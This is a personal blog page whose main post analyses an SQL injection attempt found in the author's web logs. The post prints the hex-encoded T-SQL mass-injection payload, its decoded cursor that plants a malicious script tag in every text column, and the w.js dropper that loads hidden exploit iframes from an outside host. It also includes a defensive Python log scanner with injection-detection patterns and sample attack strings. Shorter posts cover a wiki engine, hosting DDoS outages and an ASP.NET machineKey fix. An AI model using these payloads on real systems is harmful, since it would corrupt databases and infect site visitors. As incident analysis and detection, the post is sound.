Steve Trefethen
Disclaimer: The posts on this weblog are provided "AS IS" with no warranties, and confer no rights. The opinions expressed herein are my own personal opinions and do not represent my employer's view in any way.
# Monday, September 08, 2008

SQL injection attacks against my XML based blog

Tagged: Hosting

I was reviewing the logs from my site today and noticed this error message:

Error:
System.FormatException: Input string was not in a correct format.
at System.Number.StringToNumber(String str, NumberStyles options, 
NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal)
...
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, 
Boolean includeStagesAfterAsyncPoint)
while processing http://www.stevetrefethen.com/blog/monthview.aspx?year=2004;DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303
029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E61
6D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726
520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72
20622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504
54E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220
494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632
827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C7363
72697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223
E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B
6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756
E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854
2046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C6
55F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);.

As you can see, a batch of T-SQL has been tacked onto the end of the URL's year parameter: "year=2004;DECLARE @S CHAR(4000);SET @S=CAST(0x... AS CHAR(4000));EXEC(@S);". The FormatException at the top of the stack trace is the page trying to parse that entire value as an integer, which is why the request failed and was logged instead of doing anything. Only three short statements appear in clear text; the real payload is the long hex string, which the CAST turns back into a T-SQL string at run time so that none of the payload's quotes or keywords need to appear in the URL. Decoded, it reads as follows (FAIR WARNING: DO NOT ATTEMPT TO BROWSE TO THESE URLS UNLESS YOU KNOW WHAT YOU'RE DOING, YOU'VE BEEN WARNED):

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
This walks every user table (a.xtype='u') and every ntext, text, nvarchar and varchar column in it (syscolumns xtype 99, 35, 231 and 167) and prefixes each value with a closing tag, a script reference and an HTML comment opener, so whatever the column held is pushed into a comment and every page that renders the column pulls in w.js. The "not like" clause skips values that are already infected, so the worm can be re-run without doubling up. The injected tag loads w.js, which contained the following JavaScript:
// If anything below throws, still drop the exploit iframe into the page.
window.onerror = function() {
  document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");
  return true;
}
// Guard so the script runs once even when several infected columns render on one page.
if(typeof(js2eus) == "undefined") {
  var js2eus = 1;
  var yesdata;
  // Visitor fingerprint (referrer, URL, screen, return-visit count, language, UA)
  // reported to a third-party hit counter.
  yesdata = '&refe=' + escape(document.referrer) + '&location=' + escape(document.location) + '&color=' + screen.colorDepth + 'x&resolution=' + screen.width + 'x' + screen.height + '&returning=' + cc_k() + '&language=' + navigator.systemLanguage + '&ua=' + escape(navigator.userAgent);
  document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144' + yesdata + ' height=0 width=0></iframe>');
  // Hidden iframe that loads the exploit page.
  document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");
}
// Cookie helpers: return the value of a cookie whose name starts at offset iz.
function y_gVal(iz) {
  var endstr = document.cookie.indexOf(";", iz);
  if(endstr == -1) endstr = document.cookie.length;
  return document.cookie.substring(iz, endstr);
}
function y_g(name) {
  var arg = name + "=";
  var alen = arg.length;
  var clen = document.cookie.length;
  var i = 0;
  var j;
  while(i < clen) {
    j = i + alen;
    if(document.cookie.substring(i, j) == arg) return y_gVal(j);
    i = document.cookie.indexOf(" ", i) + 1;
    if(i == 0) break;
  }
  return null;
}
// Returning-visitor counter kept in the cck_lasttime / cck_count cookies.
function cc_k() {
  var y_e = new Date();
  var y_t = 93312000;
  var yesvisitor = 1000 * 36000;
  var yesctime = y_e.getTime();
  y_e.setTime(y_e.getTime() + y_t);
  var yesiz = document.cookie.indexOf("cck_lasttime");
  if(yesiz == -1) {
    document.cookie = "cck_lasttime=" + yesctime + "; expires=" + y_e.toGMTString() + "; path=/";
    document.cookie = "cck_count=0; expires=" + y_e.toGMTString() + "; path=/";
    return 0;
  }
  else {
    var y_c1 = y_g("cck_lasttime");
    var y_c2 = y_g("cck_count");
    y_c1 = parseInt(y_c1);
    y_c2 = parseInt(y_c2);
    y_c3 = yesctime - y_c1;
    if(y_c3 > yesvisitor) {
      y_c2 = y_c2 + 1;
      document.cookie = "cck_lasttime=" + yesctime + "; expires=" + y_e.toGMTString() + "; path=/";
      document.cookie = "cck_count=" + y_c2 + "; expires=" + y_e.toGMTString() + "; path=/";
    }
    return y_c2;
  }
}

Which led to an IFRAME being inserted into the page that loaded more JavaScript attempting to exploit the following ActiveX controls (all browser plug-ins common on Chinese-language desktops at the time):

  • GLIEDown.IEDown.1 (the GLWorld download control that ships with Xunlei/Thunder)
  • IERPCtl.IERPCtl.1 (RealPlayer's browser control)
  • MPS.StormPlayer (the Baofeng Storm media player)

Fortunately, nothing on my site uses MSSQL, including my blog, so this isn't particularly troubling for me. The payload is MSSQL-specific (sysobjects, syscolumns and a T-SQL cursor) and was fired at a site that has no SQL Server behind it, which is the signature of an automated, untargeted sweep rather than an attack aimed at this site. It sort of looks like it could be related to this sort of attack, as the domains have the .cn suffix for China and the description sounds quite similar.

Other than perusing my logs occasionally I don’t have anything that scans my logs looking for potential exploits. Do you use anything? If so, what approach do you use?
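As an added example (not code from the original post), here is a small Python script that does what this post did by hand, and answers the question above with a starting point: it scans IIS W3C-style log lines for query strings carrying T-SQL, flags numeric parameters such as year whose value would not parse as an integer (the cause of the FormatException above), and decodes any CAST(0x... AS CHAR/NVARCHAR(n)) literal back into text. The log lines, their field layout, and the set of parameters treated as numeric are constructed assumptions for the example; the first hex literal is the opening 40 bytes of the payload logged above, the second is a made-up NVARCHAR (UTF-16LE) variant.

```python
import re
from urllib.parse import unquote

# Hex literal cast to a string type: the encoding trick used in the logged
# payload. [N]CHAR/[N]VARCHAR decides whether the bytes are UTF-16LE or 8-bit.
CAST_HEX = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?(?:VAR)?CHAR)\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)

# Keywords and shapes that never belong in a blog's query-string values.
SQLI_INDICATORS = re.compile(
    r"\b(?:DECLARE|EXEC(?:UTE)?|CAST|SET|UNION|SELECT|INSERT|UPDATE|DELETE|DROP"
    r"|WAITFOR|xp_\w+)\b|0x[0-9A-Fa-f]{16,}|--|/\*",
    re.IGNORECASE,
)

# Parameters the application parses as integers (assumed for this example;
# monthview.aspx?year=... is the one the logged request hit).
NUMERIC_PARAMS = {"year", "month", "day", "id"}


def decode_cast_payloads(text):
    """Decode every CAST(0x... AS [N][VAR]CHAR(n)) literal found in text."""
    decoded = []
    for hexdigits, sqltype in CAST_HEX.findall(text):
        if len(hexdigits) % 2:          # odd-length literal cannot be bytes
            continue
        raw = bytes.fromhex(hexdigits)
        if sqltype.upper().startswith("N"):
            decoded.append(raw.decode("utf-16-le", errors="replace"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


def parse_query(query):
    """Split a raw query string into URL-decoded (name, value) pairs.

    Only '&' separates parameters. ';' is deliberately left inside the value
    so the appended T-SQL batch stays attached to the parameter it abused.
    """
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return pairs


def inspect_query(query):
    """Return one finding per suspicious parameter in a query string."""
    findings = []
    for name, value in parse_query(query):
        reasons = []
        if name in NUMERIC_PARAMS and not value.isdigit():
            reasons.append("non-numeric value in numeric parameter")
        if SQLI_INDICATORS.search(value):
            reasons.append("SQL keywords or long hex literal in value")
        payloads = decode_cast_payloads(value)
        if reasons or payloads:
            findings.append({"param": name, "reasons": reasons, "decoded": payloads})
    return findings


def scan_log(lines):
    """Scan W3C-style IIS log lines laid out (assumed) as:
    date time cs-method cs-uri-stem cs-uri-query sc-status"""
    hits = []
    for line in lines:
        if not line.strip() or line.startswith("#"):   # W3C directives (#Fields: ...)
            continue
        fields = line.split()
        if len(fields) < 6:
            continue
        date, time, method, stem, query, status = fields[:6]
        if query == "-":                                # IIS logs '-' for no query
            continue
        for finding in inspect_query(query):
            hits.append({"time": f"{date} {time}", "method": method, "uri": stem,
                         "status": status, **finding})
    return hits


# Constructed sample log. The first hex literal is the opening 40 bytes of the
# payload logged above; the last line uses a made-up NVARCHAR (UTF-16LE) variant.
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status",
    "2008-09-08 19:42:11 GET /blog/monthview.aspx "
    "year=2004;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    "4445434C415245204054207661726368617228323535292C40432076617263686172283430303029"
    "%20AS%20CHAR(4000));EXEC(@S); 500",
    "2008-09-08 19:43:02 GET /blog/monthview.aspx year=2004 200",
    "2008-09-08 19:44:10 GET /blog/default.aspx - 200",
    "2008-09-08 19:45:30 GET /blog/default.aspx "
    "id=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4500580045004300"
    "%20AS%20NVARCHAR(4000));EXEC(@S);-- 200",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["uri"], hit["status"], hit["param"],
              "; ".join(hit["reasons"]))
        for sql in hit["decoded"]:
            print("    decoded:", sql)
```

The numeric-parameter check is the cheapest and most reliable signal here: a value that will not parse as an integer can never be legitimate for year, whatever else the keyword regex does or does not match, and it is exactly the condition that produced the logged FormatException. Run it over a real IIS log by replacing SAMPLE_LOG with the file's lines and adjusting the field positions to match the #Fields: directive at the top of that log.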

Comments [5] # permalink Posted @ 8:58PM
# Monday, March 03, 2008

ScrewTurn the perfect small business wiki

Tagged: Hosting | Open Source | Tools

If you haven’t taken a look at ScrewTurn wiki you should. In two words, it rocks!

Why?

I think this wiki engine can easily serve as a starting point for a flexible small business web site.

I’m personally using this wiki engine on my own web site not to mention Falafel Software is using it as an internal company wiki. I’ve also installed it at a client location and it’s been well received and used daily.

If your company needs help getting this wiki or an entire web site setup feel free to contact me.
Comments [11] # permalink Posted @ 1:00PM
# Saturday, June 23, 2007

My hosting provider's response to a DDoS attack

Tagged: Hosting

The last two days have meant a lot of downtime for my domain as a result of a DDoS attack against my hosting provider, DiscountASP.NET. The response below includes a link to an explanation of what happened as well as some graphs of the traffic spike.
Dear Customer,

We experienced a network-wide outage Thursday morning and late evening
as the result of a distributed denial of service attack. You can read
details related to the outage here:
http://community.discountasp.net/default.aspx?f=6&m=18216&p=1

We would like to take this opportunity to make you aware of the
DiscountASP.NET status page, located at http://daspstatus.com.

In the event of any future network-wide outage, the status page will be
updated to provide you with as much information as possible. We hope
such a page will allow us to communicate more effectively during an
emergency situation, or when normal support office channels are affected by
an outage.

Our goal is to provide the highest quality, uninterrupted service
available anywhere. We hope that we rarely have to utilize the status page,
but we also want to be prepared to communicate during any possible
emergency situations.

Thank you for your continued support,

DiscountASP.NET
Comments [3] # permalink Posted @ 9:34AM
# Thursday, June 21, 2007

Blog outage caused by DoS attack on my hosting provider

Tagged: Hosting

I just learned via email from my provider, discountasp.net, that they've suffered a major DoS attack, which accounts for why I couldn't reach my domain or log into my hosting account. It appears as though they've mitigated the attack, as I'm able to post and log in once again.

I've mentioned it before, but I really like discountasp.net. Their service is very good, and I got a reply from support via email within a very reasonable period of time considering the circumstances.
Comments [1] # permalink Posted @ 1:06PM
# Wednesday, March 07, 2007

Fixing ASP.NET error: The state information is invalid for this page and might be corrupted.

Tagged: ASP.NET | dasBlog | Hosting | Recommended


I've been running dasBlog for several months now and had been having problems with my login timing out very quickly. I added a HealthMonitoring section to my web.config to get email notifications when errors occurred. Right away I noticed that simply refreshing the browser could trigger an authentication error like:

Forms authentication failed for the request. Reason: The ticket 
supplied was invalid.

I Googled for ways to resolve these errors and found this article from my hosting provider, no less. I then used the online machineKey generator and added the result to my web.config, and my dasBlog login errors were history, as were the invalid viewstate problems! Basically, the key used to encrypt and validate the forms authentication ticket was changing between requests as a result of either the server or the ASP.NET worker process being recycled, so a ticket issued by one process failed validation in the next. Viewstate is validated with the same machineKey, which is why pinning an explicit key in web.config cured both symptoms at once.

<providerplug>
You can probably tell I really like DiscountASP.NET: they've got great options, a great control panel (which is frequently enhanced) and some great technical staff who post to their support forums. I've gone so far as to join their referral program, so if you sign up please use the link above, which includes my referral ID, to let them know I sent you!
</providerplug>

Comments [1] # permalink Posted @ 9:48PM